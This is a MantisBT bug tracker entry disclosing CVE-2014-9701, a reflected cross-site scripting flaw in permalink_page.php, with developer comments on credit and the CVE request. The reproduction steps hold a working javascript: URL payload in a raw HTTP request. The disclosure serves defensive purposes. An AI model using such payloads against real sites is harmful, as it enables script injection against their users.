View Issue Details

IDProjectCategoryView StatusLast Update
0019493mantisbtsecuritypublic2015-03-27 04:41
ReporterTWSpiders Assigned Todregad  
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionfixed 
Product Version1.1.0a4 
Fixed in Version1.2.19 
Summary0019493: CVE-2014-9701: XSS vulnerability in permalink_page.php
Description

This issue was previously reported in 0019384. However, it was advised to create a new issue for requesting a CVE number.

Mantis 1.2.18 and prior are vulnerable to a XSS vulnerability in the 'permalink_page.php' page

Steps To Reproduce

Finding 1: Cross-Site Scripting Vulnerability in 'permalink_page.php' page

#Request:
GET /mantisbt/permalink_page.php?url=javascript:alert("XSS")// HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v7ca97s16ee4o7p3a7esqne0t0; MANTIS_secure_session=0;
MANTIS_STRING_COOKIE=b8f1c62e064b83ba98bdb851209e58869db6d583519ec51485107cc05f718602;
MANTIS_MANAGE_USERS_COOKIE=0%3Adate_created%3AASC%3A0
Connection: keep-alive

TagsNo tags attached.
Attached Files
mantisBT_XSS.png (76,038 bytes)   
mantisBT_XSS.png (76,038 bytes)   

Relationships

related to 0019384 closedatrol Multiple Cross-Site Scripting Vulnerabilities 
has duplicate 0019504 closeddregad CVE-2014-9701: XSS vulnerability in permalink_page.php 
related to 0017362 closeddregad Multiple vulnerabilities in MantisBT 

Activities

dregad

dregad

2015-03-14 05:14

developer   ~0049211

For the record, this specific XSS issue on permalink_page.php was previously reported by grangeway in 0017362:0040613 (the follow-up took place off-line via e-mail/IRC), so if any credit is to be given for this discovery, it would go to him.

dregad

dregad

2015-03-14 05:22

developer   ~0049213

Last edited: 2015-03-14 05:23

See also http://thread.gmane.org/gmane.comp.security.oss.general/14977/focus=15022

dregad

dregad

2015-03-14 06:29

developer   ~0049214

CVE request http://thread.gmane.org/gmane.comp.security.oss.general/16119

TWSpiders

TWSpiders

2015-03-17 13:26

reporter   ~0049248

This is requested for tracking purposes only. Thank you.